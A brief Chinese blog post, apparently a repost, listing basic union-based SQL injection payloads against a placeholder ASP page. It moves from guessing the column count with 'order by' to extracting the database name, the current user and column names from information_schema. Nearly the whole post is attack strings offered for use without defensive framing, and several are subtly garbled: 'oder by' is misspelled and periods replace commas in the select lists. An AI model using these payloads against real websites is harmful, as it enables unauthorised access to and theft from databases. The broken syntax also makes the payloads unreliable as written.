标签:ble www column 访问 注入 数据表 from .com 3.4
不考虑防护措施的情况下常规注入语句
网站http://www.xxxx.com/xxxx/1.Asp?id=1
猜字段http://www.xxxx.com/xxxx/1.Asp?id=1 oder by X X=(1.2.3.4.5.6.....)直至网站访问正常为止。
查询数据库http://www.xxxx.com/xxxx/1.Asp?id=1 union select 1.2.3.database().5 查询数据库名
查询数据库http://www.xxxx.com/xxxx/1.Asp?id=1 union select 1.2.3.user().5 查数据库用户
查询表明http://www.xxxx.com/xxxx/1.Asp?id=1 union select 1.2.3.4.column_name from information_schema.columns where table_name = 数据表名hex值
标签:ble www column 访问 注入 数据表 from .com 3.4
原文地址:https://www.cnblogs.com/52xuege/p/9250807.html
